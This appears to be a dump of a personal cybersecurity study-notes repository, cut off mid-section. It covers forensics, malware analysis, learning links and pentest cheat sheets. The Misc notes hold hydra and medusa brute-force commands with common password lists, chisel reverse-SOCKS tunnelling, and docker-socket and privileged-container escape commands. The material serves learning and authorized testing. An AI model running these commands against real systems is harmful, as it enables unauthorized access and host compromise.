├── Cybersecurity Learning Resources.md ├── F500 ├── Cheatsheets │ ├── 13cubed.pdf │ ├── markdown.md │ └── sans.pdf ├── Day 1.md └── Day 2.md ├── F610 ├── 1. Tools.md ├── 2. Static Properties Analysis.md ├── 3. Behavioral Analysis.md ├── 4. Static Code Analysis.md ├── 5. Maldoc Analysis.md ├── 6. Unpacking Malware.md ├── 7. Code Injections.md └── 8. Anti-debugging.md ├── Gray Hat Hacking └── 1. Preparation.md ├── Hardware └── Digispark.md ├── I want to learn.md ├── Misc ├── Android Shell Commands.md ├── Auth Bruteforcing.md ├── CIA - Vault7.md ├── Chisel.md ├── Container Security.md ├── Cracking Hashes.md ├── Custom Wordlists.md ├── File Transfers.md ├── Firewall Evasion.md ├── Recon.md ├── SSH Forward Connections.md ├── SSH Remote Connections.md ├── Socat.md └── Wireless Security.md ├── P300 ├── 1. Client Side Code Execution With Office.md └── 2. Client Side Code Execution With Windows Script Host.md ├── Pasted image 20220801123813.png ├── Pentesting Active Directory ├── 0. Active Directory 101.md ├── Active Directory Enumeration.md ├── Active Directory.md └── Breaching Active Directory.md ├── Pentesting Linux Hosts ├── Linux Persistence Backdoors.md ├── Linux Post-Exploitation.md ├── Linux Privilege Escalation.md └── Linux Reverse Shells.md ├── Pentesting Windows Hosts ├── Windows Code Execution to Shell.md ├── Windows Post-Exploitation.md └── Windows Privilege Escalation.md ├── Ports ├── 111 NFS.md ├── 135 RPC.md ├── 1433 MSSQL.md ├── 161 SNMP.md ├── 2049 NFS.md ├── 21 FTP.md ├── 25 SMTP.md ├── 3306 MYSQL.md ├── 3389 RDP.md ├── 389 LDAP.md ├── 445 SMB.md ├── 53 DNS.md ├── 5985 PS Remoting.md ├── 80 HTTP.md └── 88 Kerberos.md ├── RTO ├── API Hashing.md ├── Antivirus Evasion.md ├── Dropper.md ├── Function Call Obfuscation.md ├── GuidedHacking Videos.md ├── Hooks Removal and Bypass.md ├── Removing CRT.md ├── Shellcode Injection.md ├── Shellcode Obfuscation.md └── Shellcode POC.md └── Web Security ├── File Inclusions.md ├── JWT.md ├── Log4j.md ├── SQL Injections.md ├── Server Side Request Forgery.md └── Server-side Template Injections.md /Cybersecurity Learning Resources.md: -------------------------------------------------------------------------------- 1 | 2 | # Cybersecurity Learning Services 3 | | Description | Link | 4 | | --- | --- | 5 | | Linux/Bash tutorials | https://cmdchallenge.com/ | 6 | | Pentesting, CTF challenges | https://app.hackthebox.com/ | 7 | | Everything security related | https://tryhackme.com/ | 8 | | Single machine pentesting| https://portal.offensive-security.com/labs/play | 9 | | Digital Forensic and Incident Response | https://blueteamlabs.online/home | 10 | | Digital Forensic and Incident Response | https://cyberdefenders.org/blueteam-ctf-challenges/ | 11 | | Web Security | https://portswigger.net/web-security | 12 | | Cross Site Scripting | https://alf.nu/alert1 | 13 | | Web, API, AWS and Front-End security | https://application.security/ | 14 | | Cryptography | https://cryptohack.org/ | 15 | | Binary Exploitation | https://pwn.college/ | 16 | 17 | # Pentesting Labs 18 | | Price (eur) | Machines | Organization | Mame | Link | 19 | | --- | --- | --- | --- | --- | 20 | | 0 | 2 | eLearnSecurity | Black-box Penetration Test 1 | [link](https://my.ine.com/CyberSecurity/courses/6f986ca5/penetration-testing-basics/lab/a8e27b29-5c64-43c3-9643-41026ecc895a) | 21 | | 0 | 2 | eLearnSecurity | Black-box Penetration Test 2 | [link](https://my.ine.com/CyberSecurity/courses/6f986ca5/penetration-testing-basics/lab/6f6dd176-54f6-442f-968a-ada7454ff9fa) | 22 | | 10/month | 2 | Hack the Box | P.O.O. | [link](https://app.hackthebox.com/endgames/poo) | 23 | | 0 | 3 | eLearnSecurity | Black-box Penetration Test 3 | [link](https://my.ine.com/CyberSecurity/courses/6f986ca5/penetration-testing-basics/lab/077b45bc-9eaa-4c2e-bcb3-a949a89b95fa) | 24 | | 0 | 3 | TryHackMe | Wreath | [link](https://tryhackme.com/room/wreath) | 25 | | 10/month | 3 | Hack the Box | Hades | [link](https://app.hackthebox.com/endgames/hades) | 26 | | 10/month | 4 | Hack the Box | RPG | [link](https://app.hackthebox.com/endgames/rpg) | 27 | | 10/month | 6 | Hack the Box | Xen | [link](https://app.hackthebox.com/endgames/xen) | 28 | | 10/month | 6 | TryHackMe | Holo | [link](https://tryhackme.com/room/hololive) | 29 | | 60/month | 11 | TryHackMe | Throwback | [link](https://tryhackme.com/network/throwback) | 30 | | 80+20/month | 14 | Hack the Box | Dante | [link](https://app.hackthebox.com/prolabs/overview/dante) | 31 | | 80+20/month | 15 | Hack the Box | RastaLabs | [link](https://app.hackthebox.com/prolabs/overview/rastalabs) | 32 | | 80+20/month | 18 | Hack the Box | APTLabs | [link](https://app.hackthebox.com/prolabs/overview/aptlabs) | 33 | | 80+20/month | 21 | Hack the Box | Offshore | [link](https://app.hackthebox.com/prolabs/overview/offshore) | 34 | | 80+20/month | 28 | Hack the Box | Cybernetics | [link](https://app.hackthebox.com/prolabs/overview/cybernetics) | 35 | | 149 | ? | Pentester Academy | Attacking Active Directory with Linux Lab | [link](https://www.pentesteracademy.com/linuxad) | 36 | | 250 | ? | Pentester Academy | Attacking and Defending Active Directory Lab | [link](https://www.pentesteracademy.com/activedirectorylab) | 37 | | 299 | ? | Pentester Academy | Red Team Lab | [link](https://www.pentesteracademy.com/redteamlab) | 38 | | 339 | ? | Pentester Academy | Global Central Bank: An Enterprise Cyber Range | [link](https://www.pentesteracademy.com/gcb) | 39 | | 470 | ? | Zero Point Security | Red Team Ops | [link](https://training.zeropointsecurity.co.uk/courses/red-team-ops) | 40 | 41 | # Courses 42 | ## Malware Development 43 | - Zero Point Security - [C2 Development in C#](https://training.zeropointsecurity.co.uk/courses/c2-development-in-csharp) (~60€) 44 | - Zero Point Security - [Offensive Driver Development](https://training.zeropointsecurity.co.uk/courses/offensive-driver-development) (~60€) 45 | - Sektor7 - [RED TEAM Operator: Malware Development Essentials](https://institute.sektor7.net/red-team-operator-malware-development-essentials) (~200€) 46 | - Sektor7 - [RED TEAM Operator: Malware Development Intermediate](https://institute.sektor7.net/rto-maldev-intermediate) (~220€) 47 | - Sektor7 - [RED TEAM Operator: Windows Evasion](https://institute.sektor7.net/rto-win-evasion) (~230€) 48 | - Sektor7 - [RED TEAM Operator: Windows Persistence](https://institute.sektor7.net/rto-windows-persistence) (~230€) 49 | - Sektor7 - [RED TEAM Operator: Privilege Escalation in Windows](https://institute.sektor7.net/rto-lpe-windows) (~220€) 50 | - Offensive Security - [PEN-300](https://www.offensive-security.com/pen300-osep/) (~1500€) 51 | - Dark Vortex - [Malware On Steroids](https://0xdarkvortex.dev/training-programs/malware-on-steroids/) (~2000€) 52 | - Dark Vortex - [Offensive Tool Development](https://0xdarkvortex.dev/training-programs/offensive-tool-development/) (~2000€) 53 | 54 | ## Malware Analysis 55 | - Neil Fox - [Noob2Ninja](https://www.youtube.com/playlist?list=PLiFO-R_BI-kAqDPqtnOq2n70mtAZ6xg5N) (FREE) 56 | - @0verfl0w_ - [The Beginner Malware Analysis Course](https://www.0ffset.net/training/beginner-malanalysis/) (~45€) 57 | - @0verfl0w_ - [Zero2Automated](https://courses.zero2auto.com/adv-malware-analysis-course) (~175€) 58 | - SANS - [FOR610](https://www.sans.org/cyber-security-courses/reverse-engineering-malware-malware-analysis-tools-techniques/) (~7500€ ...no that's not a typo) 59 | - SANS - [FOR710](https://www.sans.org/cyber-security-courses/reverse-engineering-malware-advanced-code-analysis/) (~7500€ ...no that's also not a typo) -------------------------------------------------------------------------------- /F500/Cheatsheets/13cubed.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/melnicek/notes/8bfef9acc8615f7591d9c00977f586b7cbf43895/F500/Cheatsheets/13cubed.pdf -------------------------------------------------------------------------------- /F500/Cheatsheets/sans.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/melnicek/notes/8bfef9acc8615f7591d9c00977f586b7cbf43895/F500/Cheatsheets/sans.pdf -------------------------------------------------------------------------------- /F500/Day 1.md: -------------------------------------------------------------------------------- 1 | 2 | https://www.magnetforensics.com/resource-search-results/?category=free-tool 3 | 4 | # RAM Image Acquisition 5 | ## Live 6 | - DumpIt 7 | - FTK Imager 8 | - Magnet Forensics RamCapture 9 | - Belkasoft Live RAM Capturer 10 | ## Dead 11 | - %SystemDrive%/hiberfil.sys 12 | - %SystemDrive%/pagefile.sys 13 | - %WINDIR%/MEMORY.DMP 14 | 15 | # Checking for Encryption 16 | - EDD.exe 17 | 18 | # Disk Image Acquisition 19 | Registry Hives and Backups, LNK Files, Jump Lists, Prefetch, Event Logs and PnP Logs, Browser Data, Recycle Bin, Master File Table, NTFS Log File and Journal Log, Pagefile and Hibernation Files 20 | 21 | ``` 22 | ./CyLR.exe -c CONFIG 23 | ``` 24 | 25 | # Mounting Disk Images 26 | - FTK Imager 27 | - Arsenal Image Mounter 28 | 29 | # Data Stream Carving 30 | - Internet Evidence Finder 31 | - Axiom 32 | 33 | # File Carving 34 | - PhotoRec ([link](https://www.cgsecurity.org/wiki/TestDisk_Download)) 35 | - PhotoRec_Sorter -------------------------------------------------------------------------------- /F500/Day 2.md: -------------------------------------------------------------------------------- 1 | 2 | # Location of Registry Hives 3 | %WinDir%/System32/Config 4 | - SAM 5 | - SECURITY 6 | - SYSTEM 7 | - SOFTWARE 8 | - DEFAULT 9 | 10 | %WinDir%/appcompat/Programs/AMCACHE.hve 11 | 12 | %WinDir%/System32/Config/RegBack 13 | - SAM 14 | - SECURITY 15 | - SYSTEM 16 | - SOFTWARE 17 | - DEFAULT 18 | 19 | %UserProfile%/NTUSER.DAT 20 | 21 | %UserProfile%/AppData/Local/Microsoft/Windows/USRCLASS.DAT 22 | 23 | # Viewing Registry Hives 24 | - Registry Explorer.exe ([link](https://ericzimmerman.github.io/#!index.md)) 25 | - cafae.exe ([link](https://tzworks.com/prototype_page.php?proto_id=19)) 26 | - RegEdit.exe 27 | 28 | | Location | Info | 29 | | --- | --- | 30 | | SOFTWARE/Microsoft/Windows NT/CurrentVersion | OS Version | 31 | | SYSTEM/Select | CurrentControlSet | 32 | | SYSTEM/CurrentControlSet/Control/ComputerName/ComputerName | Computer Name | 33 | | SYSTEM/CurrentControlSet/Control/TimeZoneInformation | Time Zone | 34 | | SYSTEM/CurrentControlSet/Services/Tcpip/Parameters/Interfaces | Network Interfaces | 35 | | SYSTEM/CurrentCOntrolSet/Services/lanmanserver/Share | Shares | 36 | 37 | -------------------------------------------------------------------------------- /F610/1. Tools.md: -------------------------------------------------------------------------------- 1 | # Analysis Tools 2 | Static properties analysis: 3 | - PeStudio 4 | - CFF Explorer 5 | - peframe 6 | - Detect It Easy 7 | - ImHex 8 | 9 | Behavioral analysis: 10 | - Process Hacker 2 11 | - Process Monitor 12 | - RegShot 13 | - Wireshark 14 | - fakedns 15 | - INetSim 16 | 17 | Code analysis: 18 | - Ghidra 19 | - x32dbg/x64dbg 20 | - OllyDumpEx 21 | - runsc 22 | - Scylla 23 | 24 | # Online Tools 25 | Malware repositories: 26 | - https://github.com/ytisf/theZoo 27 | - https://samples.vx-underground.org/samples/Families/ 28 | - https://zeltser.com/malware-sample-sources/ 29 | - https://malware-traffic-analysis.net/ 30 | 31 | Multi-engine scanners: 32 | - VirusTotal 33 | - MetaDefender 34 | - VirSCAN 35 | - AVCaesar 36 | 37 | File reputation: 38 | - Malware Hash Registry 39 | - HashSets 40 | - Winbindex 41 | 42 | Automated Sandboxes: 43 | - Any.run 44 | - CAPE 45 | - Intezner Analyze 46 | - Hybrid Analysis 47 | 48 | Websote investigation: 49 | - urlQuery 50 | - vURL 51 | - Quttera 52 | - urlscan.io 53 | -------------------------------------------------------------------------------- /F610/2. Static Properties Analysis.md: -------------------------------------------------------------------------------- 1 | Gathering basic file properties: 2 | - file and section hashes 3 | - packer identification 4 | - embedded resources 5 | - imports and exports 6 | - crypto references 7 | - digital certificates 8 | - interesting strings 9 | 10 | # Hashes 11 | sha256sum.exe FILE 12 | md5sum.exe FILE 13 | https://virustotal.com/gui/search/HASH 14 | 15 | # Strings 16 | On linux: 17 | ``` bash 18 | $ floss FILE 19 | $ pestr FILE 20 | $ xorsearch FILE 'QUERY' # query for example 'http' 21 | $ strings -a FILE 22 | $ strings --encoding=l FILE 23 | ``` 24 | 25 | On windows: 26 | ```powershell 27 | > floss FILE 28 | ``` 29 | 30 | # Capa 31 | ```bash 32 | $ capa FILE 33 | $ capa -vv FILE 34 | ``` 35 | 36 | # File properties 37 | PeStudio (windows) / peframe (linux) 38 | 39 | # FIle creation info 40 | Detect It Easy (windows) / Exeinfo PE (windows) / diec (linux) -------------------------------------------------------------------------------- /F610/3. Behavioral Analysis.md: -------------------------------------------------------------------------------- 1 | # Process hacker 2 | Just running on the background. 3 | 4 | # Process monitor 5 | filter > processname is FILENAME 6 | process tree > explorer.exe > children 7 | File > Save > All events > Comma-Separated Values > ProcDOT > Procmon [...] > Launcher [...] > Refresh 8 | 9 | # Regshot 10 | First snap before detonation, second after detonation 11 | 12 | # INetSim 13 | logs: `/var/log/inetsim` 14 | files: `/var/lib/inetsim` 15 | configuration: `/etc/inetsim/inetsim.conf` 16 | ``` 17 | start_service dns 18 | service_bind_address 0.0.0.0 19 | dns_default_ip LHOST 20 | ``` 21 | 22 | # Wireshark 23 | ``` 24 | ip.addr / ip.src / ip.dst == IP 25 | tcp.port == PORT 26 | 27 | http or dns 28 | http.request 29 | http.response.code == CODE 30 | 31 | !(arp or dns or icmp) 32 | tcp.analysis.flags 33 | tcp.flag.syn / tcp.flag.reset == 1 34 | ``` 35 | 36 | # Redirect traffic going to any IP 37 | On REMnux: 38 | ``` 39 | accept-all-ips start 40 | accept-all-ips stop 41 | ``` 42 | 43 | Using iptables: 44 | ``` 45 | iptables -t nat -A PREROUTING -i eth0 -j REDIRECT 46 | iptables -t nat -D PREROUTING -i eth0 -j REDIRECT 47 | ``` 48 | 49 | # Debuggers 50 | x32dbg/x64dbg 51 | 52 | bp CreateProcessW 53 | bp CreateProcessA 54 | bp LoadLibraryA 55 | bp GetProcAddress -------------------------------------------------------------------------------- /F610/4. Static Code Analysis.md: -------------------------------------------------------------------------------- 1 | # Top 15 opcodes: 2 | | Instructions | Function | 3 | | --- | --- | 4 | | mov push pop lea | Moving data | 5 | | add sub xor and | Manipulating data | 6 | | cmp test | Comparing data | 7 | | call retn jmp jz jnz | Changing execution path | 8 | All the jumps explained: http://unixwiz.net/techtips/x86-jumps.html 9 | 10 | # Ghidra 11 | Analysis options > WindowsPE x86 Propagate External Parameters 12 | Window > Symbol References > Filter 13 | Window > Function Call Trees 14 | 15 | Window layout: 16 | | Monitor 1 | Monitor 2 | Monitor 3 | 17 | | --- | --- | --- | 18 | | Symbol References/Function Call Trees | Listing/Decompile | Web Browser/Notes | 19 | 20 | Interesting library functions: 21 | - ShellExecute? 22 | - CreateProcess? 23 | - LoadLibrary? 24 | - GetProcAddress 25 | - ?clipboard? 26 | - ?keystate? 27 | - ?window? -------------------------------------------------------------------------------- /F610/5. Maldoc Analysis.md: -------------------------------------------------------------------------------- 1 | # .PDF 2 | Risky keywords: 3 | | Keyword | Function | 4 | | --- | --- | 5 | | /JS /JavaScript /AcroForm /XFA | Executing JS | 6 | | /Launch /EmbeddedFile | Launching the programs | 7 | | /OpenAction /AA | Take action when PDF is open | 8 | | /URI /SubmitForm | Interraction with websites | 9 | 10 | ```bash 11 | $ pdfid.py FILE -n 12 | $ pdf-parser.py FILE -a 13 | $ pdf-parser.py FILE -s KEYWORD 14 | $ pdf-parser.py FILE -k KEYWORD 15 | $ pdf-parser.py FILE -o OBJECT_ID 16 | $ pdf-parser.py FILE -o OBJECT_ID -d DUMP_FILENAME 17 | $ pdf-parser.py FILE -r REFERENCED_OBJECT_ID 18 | ``` 19 | 20 | # .DOC 21 | ```bash 22 | $ zipdump.py FILE 23 | $ zipdump.py FILE -s INDEX -d > FILENAME 24 | 25 | $ oleid FILE 26 | 27 | $ olevba FILE 28 | 29 | $ oledump.py -i FILE 30 | $ oledump.py -s a -v FILE 31 | 32 | $ pcode2code INFILE > OUTFILE 33 | 34 | $ evilclippy -uu FILE 35 | ``` 36 | 37 | Add this to the Auto_Open/DocumentOpen to start debugger: 38 | ``` 39 | Debug.Assert False 40 | ``` 41 | 42 | # .JS 43 | ```bash 44 | $ js-beautify FILE 45 | $ js -f FILE 46 | $ js -f /usr/share/remnux/objects.js FILE 47 | ``` 48 | 49 | Suspicious keywords: 50 | - eval 51 | - callee 52 | 53 | To debug evals we can add this snippet to the top of a file: 54 | ```js 55 | orig_eval = eval; 56 | eval = function(input_string) { 57 | WScript.Echo(input_string); 58 | orig_eval(input_string); 59 | 60 | } 61 | ``` -------------------------------------------------------------------------------- /F610/6. Unpacking Malware.md: -------------------------------------------------------------------------------- 1 | # Detection 2 | Use 'Detect It Easy', 'ExeInfo PE' or 'PEiD' to check for common packers. 3 | 4 | Online service for unpacking: 5 | https://www.unpac.me/ 6 | https://www.youtube.com/watch?v=FctDptnYukQ 7 | 8 | # Using debugger to unpack aditional stages 9 | bp VirtualAllocEx 10 | 11 | x??dbg > Plugins > OllyDumpEx > Dump the Process > Get RIP as OEP > Dump > Plugins > Scylla > IAT Autosearch > Get Imports > Fix Dump 12 | 13 | -------------------------------------------------------------------------------- /F610/7. Code Injections.md: -------------------------------------------------------------------------------- 1 | # Windows APIs to watch out for 2 | - GetModuleHandle 3 | - LoadLibraryW 4 | - GetProcAddress 5 | 6 | - CreateToolhelp32Snapshot 7 | - OpenProcess 8 | 9 | - VirtualAllocEx 10 | - WriteProcessMemory 11 | - VirtualProtectEx 12 | - CreateRemoteThread -------------------------------------------------------------------------------- /F610/8. Anti-debugging.md: -------------------------------------------------------------------------------- 1 | # TLDR 2 | bp IsDebuggerPresent 3 | bp OutputDebugString 4 | bp CheckRemoteDebuggerPresent 5 | bp NtQueryInformationProcess 6 | bp ZwQueryInformationProcess 7 | bp GetTickCount 8 | bp GetLocalTime 9 | bp GetSystemTime 10 | 11 | Checking BeingDebugged field in the PEB: 12 | ``` 13 | mov eax, fs:[30h] 14 | mov eax, [eax+2] 15 | test eax, eax 16 | ``` 17 | 18 | Checking NtGlobalFlag field in the PEB: 19 | ``` 20 | mov eax, dword ptr fs:[30] 21 | test byte ptr ds:[eax+68], 70 ; 32-bit 22 | test byte ptr ds:[eax+bc], 70 ; 64-bit 23 | ``` 24 | 25 | Checking if the program is executing slowly: 26 | ```c 27 | if ( ( GetTickCount() - lStartTime ) > 5000 ) { 28 | exit(1); 29 | } 30 | ``` 31 | 32 | GetTickCount alternatives: GetLocalTime, GetSystemTime, RDTSC instruction. 33 | 34 | -------------------------------------------------------------------------------- /Gray Hat Hacking/1. Preparation.md: -------------------------------------------------------------------------------- 1 | # Binary, Dynamic Information-Gathering Tools 2 | ```bash 3 | ldd FILE 4 | objdump -R FILE 5 | strings -tx FILE 6 | 7 | strace FILE 8 | strace -e trace=SYSCALL FILE 9 | ltrace FILE 10 | 11 | checksec --file=FILE 12 | 13 | one_gadget ... 14 | ropper ... 15 | ``` -------------------------------------------------------------------------------- /Hardware/Digispark.md: -------------------------------------------------------------------------------- 1 | # preferences > aditional boards manager urls: 2 | http://digistump.com/package_digistump_index.json 3 | 4 | # tools > board > board manager 5 | digistump avr boards 6 | 7 | # install micronucleus 8 | yay -S micronucleus 9 | 10 | # add user to 'uucp' group 11 | 12 | # locate installed micronucleus 13 | locate micronucleus 14 | 15 | # override old micronucleus with newly installed 16 | cp NEWPATH ~/.arduino15/packages/digistump/tools/micronucleus/2.0a4/micronucleus 17 | -------------------------------------------------------------------------------- /I want to learn.md: -------------------------------------------------------------------------------- 1 | # I want to learn ... 2 | 3 | ## ... basics: 4 | - https://cmdchallenge.com/ 5 | - https://overthewire.org/wargames/bandit/ 6 | - https://app.hackthebox.com/starting-point 7 | 8 | ## ... web security: 9 | - https://portswigger.net/web-security/learning-path 10 | - https://www.hacksplaining.com/lessons 11 | - https://alf.nu/alert1 12 | 13 | ## ... penetration testing: 14 | - https://app.hackthebox.com/machines/list/active 15 | - https://www.youtube.com/c/ippsec 16 | - https://portal.offensive-security.com/labs/play 17 | 18 | ## ... digital forensic & incident response: 19 | - https://cyberdefenders.org/blueteam-ctf-challenges/ 20 | - https://blueteamlabs.online/home/challenges 21 | - https://letsdefend.io/ 22 | - https://www.youtube.com/c/13cubed 23 | 24 | ## ... malware analysis: 25 | - https://www.youtube.com/playlist?list=PLiFO-R_BI-kAqDPqtnOq2n70mtAZ6xg5N 26 | - https://forum.tuts4you.com/files/categories/ 27 | - https://www.youtube.com/c/OALabs 28 | - https://www.youtube.com/c/MalwareAnalysisForHedgehogs 29 | 30 | ## ... malware development: 31 | - https://shogunlab.gitbook.io/building-c2-implants-in-cpp-a-primer/ 32 | - https://www.youtube.com/watch?v=TfG9lBYCOq8 33 | - https://www.vx-underground.org/windows.html 34 | 35 | ## ... game hacking: 36 | - https://www.youtube.com/c/GuidedHacking 37 | - https://www.youtube.com/c/NullTerminator 38 | 39 | ## ... binary exploitation: 40 | - https://pwn.college/ 41 | - https://guyinatuxedo.github.io/index.html 42 | - https://www.youtube.com/channel/UCksdNO8hAiOQoWZhEXhyyZA 43 | 44 | ## ... cryptography: 45 | - https://cryptohack.org/challenges/ 46 | - https://cryptopals.com/ 47 | -------------------------------------------------------------------------------- /Misc/Android Shell Commands.md: -------------------------------------------------------------------------------- 1 | ## Downloading APKs 2 | adb shell pm list packages 3 | adb shell pm path PACKAGE 4 | adb pull APKPATH DESTINATION 5 | 6 | ## Misc 7 | adb shell settings put global http_proxy LHOST:LPORT 8 | adb install APK -------------------------------------------------------------------------------- /Misc/Auth Bruteforcing.md: -------------------------------------------------------------------------------- 1 | # Authentication bruteforcing 2 | 3 | ## Medusa 4 | 5 | ```bash 6 | medusa -h RHOST -M ssh -U PASSWORDS -P USERNAMES 7 | ``` 8 | 9 | ## Hydra 10 | 11 | ```bash 12 | hydra -L USERNAMES -P PASSWORDS SSH://TARGET -T 64 13 | ``` 14 | 15 | ## Default credentials 16 | 17 | SecLists/Usernames/top-usernames-shortlist.txt 18 | ``` 19 | root 20 | admin 21 | test 22 | guest 23 | info 24 | adm 25 | mysql 26 | user 27 | administrator 28 | oracle 29 | ftp 30 | pi 31 | puppet 32 | ansible 33 | ec2-user 34 | vagrant 35 | azureuser 36 | ``` 37 | 38 | SecLists/Passwords/darkweb2017-top100.txt 39 | ``` 40 | 123456 41 | 123456789 42 | 111111 43 | password 44 | qwerty 45 | abc123 46 | 12345678 47 | password1 48 | 1234567 49 | 123123 50 | 1234567890 51 | 000000 52 | 12345 53 | iloveyou 54 | 1q2w3e4r5t 55 | 1234 56 | 123456a 57 | qwertyuiop 58 | monkey 59 | 123321 60 | dragon 61 | 654321 62 | 666666 63 | 123 64 | myspace1 65 | a123456 66 | 121212 67 | 1qaz2wsx 68 | 123qwe 69 | 123abc 70 | tinkle 71 | target123 72 | gwerty 73 | 1g2w3e4r 74 | gwerty123 75 | zag12wsx 76 | 7777777 77 | qwerty1 78 | 1q2w3e4r 79 | 987654321 80 | 222222 81 | qwe123 82 | qwerty123 83 | zxcvbnm 84 | 555555 85 | 112233 86 | fuckyou 87 | asdfghjkl 88 | 12345a 89 | 123123123 90 | 1q2w3e 91 | qazwsx 92 | computer 93 | aaaaaa 94 | 159753 95 | iloveyou1 96 | fuckyou1 97 | princess 98 | 789456123 99 | 11111111 100 | 123654 101 | princess1 102 | 888888 103 | linkedin 104 | michael 105 | sunshine 106 | football 107 | 11111 108 | 777777 109 | 1234qwer 110 | 999999 111 | j38ifUbn 112 | monkey1 113 | football1 114 | daniel 115 | azerty 116 | a12345 117 | 123456789a 118 | 789456 119 | asdfgh 120 | love123 121 | abcd1234 122 | jordan23 123 | 88888888 124 | 5201314 125 | 12qwaszx 126 | FQRG7CS493 127 | ashley 128 | asdf 129 | asd123 130 | superman 131 | jessica 132 | love 133 | samsung 134 | shadow 135 | blink182 136 | 333333 137 | michael1 138 | babygirl1 139 | ``` 140 | -------------------------------------------------------------------------------- /Misc/CIA - Vault7.md: -------------------------------------------------------------------------------- 1 | Malware development DOs and DON'Ts 2 | https://wikileaks.org/ciav7p1/cms/page_14587109.html 3 | 4 | Using cryptography 5 | https://wikileaks.org/ciav7p1/cms/files/NOD%20Cryptographic%20Requirements%20v1.1%20TOP%20SECRET.pdf 6 | 7 | In-memory Code Execution 8 | https://wikileaks.org/ciav7p1/cms/files/ICE-Spec-v3-final-SECRET.pdf 9 | 10 | Persisted DLL 11 | https://wikileaks.org/ciav7p1/cms/files/Persisted-DLL-Spec-v2-SECRET.pdf 12 | -------------------------------------------------------------------------------- /Misc/Chisel.md: -------------------------------------------------------------------------------- 1 | # chisel 2 | 3 | [https://github.com/jpillora/chisel](https://github.com/jpillora/chisel) 4 | 5 | ## Local Port Forward 6 | 7 | Proxy host: 8 | ``` 9 | ./chisel server -p LPORT 10 | ``` 11 | 12 | Attacker host: 13 | ``` 14 | ./chisel client RHOST:RPORT LPORT:RHOST:RPORT 15 | ``` 16 | 17 | ## Remote Port Forward 18 | 19 | Attacker host: 20 | ``` 21 | ./chisel server -p LPORT --reverse & 22 | ``` 23 | 24 | Proxy host: 25 | ``` 26 | ./chisel client RHOST:RHOST R:LPORT:RHOST:RHOST & 27 | ``` 28 | 29 | ## Reverse SOCKS Proxy 30 | 31 | On attacker host: 32 | ``` 33 | ./chisel server -p LPORT --reverse & 34 | ``` 35 | 36 | On proxy host: 37 | ``` 38 | ./chisel client RHOST:RPORT R:socks & 39 | ``` 40 | 41 | Then use proxychains. 42 | 43 | ## Forward SOCKS Proxy 44 | 45 | On proxy host: 46 | ``` 47 | ./chisel server -p LPORT --socks5 48 | ``` 49 | 50 | On attacker host: 51 | ``` 52 | ./chisel client RHOST:RPORT LPORT:socks 53 | ``` 54 | 55 | Then use proxychains. 56 | -------------------------------------------------------------------------------- /Misc/Container Security.md: -------------------------------------------------------------------------------- 1 | https://www.youtube.com/watch?v=0hrv0qyOEd0 2 | https://bootcamps.pentesteracademy.com/course/container-security-on-demand 3 | 4 | ## Docker Commands 5 | ```bash 6 | docker info 7 | docker pull IMAGE:TAG 8 | docker images / docker image ls 9 | 10 | docker run -dt IMAGE # detached 11 | docker run -it IMAGE # interactive 12 | 13 | docker ps / docker container ls 14 | 15 | docker inspect ID/NAME 16 | docker attach ID/NAME 17 | docker exec -dt ID/NAME COMMAND 18 | docker exec -it ID/NAME COMMAND 19 | 20 | docker stop ID/NAME 21 | docker start ID/NAME 22 | docker kill ID/NAME 23 | 24 | docker container ... 25 | docker image ... 26 | docker network ... 27 | ``` 28 | --- 29 | ## Dockerfile 30 | ```Dockerfile 31 | FROM alpine 32 | 33 | COPY script.sh /root/ 34 | 35 | run chmod +x /root/script 36 | ``` 37 | 38 | ```bash 39 | docker build -t IMAGE . 40 | ``` 41 | --- 42 | ## docker-compose.yaml 43 | ```yaml 44 | version: "3.5" 45 | services: 46 | appserver: 47 | image: IMAGE 48 | networks: 49 | - backend 50 | memcache: 51 | image: IMAGE 52 | networks: 53 | - backend 54 | networks: 55 | backend: 56 | name: test-net 57 | driver: bridge 58 | ``` 59 | 60 | ```bash 61 | docker-compose up 62 | ``` 63 | --- 64 | ## Docker API without Docker client 65 | When you don't have docker client installed you can use http api/unix socket. 66 | ```bash 67 | curl http://localhost:2375/images/json 68 | curl --unix-socket /var/run/docker.sock http://localhost/images/json 69 | 70 | curl http://HOST/v2/_catalog 71 | curl http://HOST/v2/REPO/tags/list 72 | curl http://HOST/v2/REPO/manifests/TAG 73 | curl -s http://HOST/v2/REPO/blobs/sha256:SHASUM --output layer1.tar 74 | ``` 75 | 76 | Or when we have no docker socket but only tcp api. 77 | ```bash 78 | export DOCKER_HOST="tcp://127.0.0.1:2375" 79 | docker ps 80 | ``` 81 | 82 | --- 83 | ## Mounted Docker Socket 84 | #### Insecure Option 85 | `-v /var/run/docker.sock:/var/run/docker.sock` 86 | #### Why? 87 | Management or monitoring purposes (portainer, sysdig, gitlab runner). 88 | #### Enumeration 89 | Inside of the docker container we can search for docker socket using find command. 90 | ```bash 91 | find / -name docker.sock 2>/dev/null 92 | ``` 93 | #### Exploitaion 94 | If we find the socket, we can start another container using said socket and mount host's filesystem into it, then chroot to the host filesystem. 95 | ```bash 96 | docker run -it -v /:/host IMAGE bash 97 | chroot /host bash 98 | ``` 99 | --- 100 | ## Privileged Container 101 | #### Insecure Option 102 | `--privileged` 103 | #### Why? 104 | Used for monitoring privileged containers. 105 | #### Enumeration 106 | We can use `capsh --print` to enumerate linux capabilities. 107 | #### Exploitation 108 | Then when we can see main harddisk (/dev/sda), we will mount and chroot into it. 109 | ```bash 110 | mount /dev/sda /host 111 | chroot /host bash 112 | ``` 113 | --- 114 | ## Shared Network Namespace 115 | #### Insecure Option 116 | `--network host` 117 | #### Why? 118 | portainer 119 | #### Enumeration 120 | We will use `ip a` to look for host interfaces. 121 | #### Exploitation 122 | Portforward from container to a host. If portainer is present, run new container > mount host's root > chmod into it. 123 | 124 | --- 125 | ## SYS_MODULE Capability 126 | #### Insecure Option 127 | `--cap-add SYS_MODULE` 128 | #### Why? 129 | Monitoring 130 | #### Enumeration 131 | We can use `capsh --print` to enumerate linux capabilities. 132 | #### Exploitation 133 | Create the kernel module. 134 | 135 | Then create a Makefile. 136 | ```bash 137 | obj-m +=shell.o 138 | 139 | all: 140 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules 141 | clean: 142 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean 143 | ``` 144 | 145 | Make the module. 146 | ```bash 147 | make 148 | ``` 149 | 150 | And insert the kernel module. 151 | ``` 152 | insmod shell.ko 153 | ``` 154 | --- 155 | ## 